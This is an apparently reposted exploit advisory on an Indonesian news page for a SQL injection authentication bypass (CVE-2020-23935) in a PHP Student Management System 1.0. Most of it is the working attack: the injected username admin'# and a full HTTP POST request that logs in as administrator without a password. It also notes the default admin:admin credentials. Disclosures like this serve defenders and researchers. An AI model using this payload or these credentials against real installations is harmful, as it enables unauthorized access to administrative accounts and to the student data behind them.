Sistem Manajemen Mahasiswa Kabir Alhasan 1.0 SQL Injection

  • Whatsapp
Sistem Manajemen Mahasiswa Kabir Alhasan 1.0 SQL Injection
Sistem Manajemen Mahasiswa Kabir Alhasan SQL Injection

News.nextcloud.asia

Sistem Manajemen Mahasiswa Kabir Alhasan versi 1.0 mengalami kerentanan injeksi SQL jarak jauh yang memungkinkan bypass otentikasi.

MD5 | 380cb8cbd93f5ec166d4924702670db5

# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass
# Date: 2020-07-06
# Exploit Author: Enes Özeser
# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html
# Version: 1.0
# Tested on: Windows & WampServer
# CVE: CVE-2020-23935

1- Go to following url. >> http://(HOST)/admin/login.php
2- We can login succesfully with SQL bypass method.

-- Username = admin'#
-- Password = (Write Something)

NOTE: Default username and password is admin:admin.

(( HTTP Request ))

POST /process.php HTTP/1.1
Host: (HOST)
Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://(HOST)/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://(HOST)/index.php?q=login
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl

U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.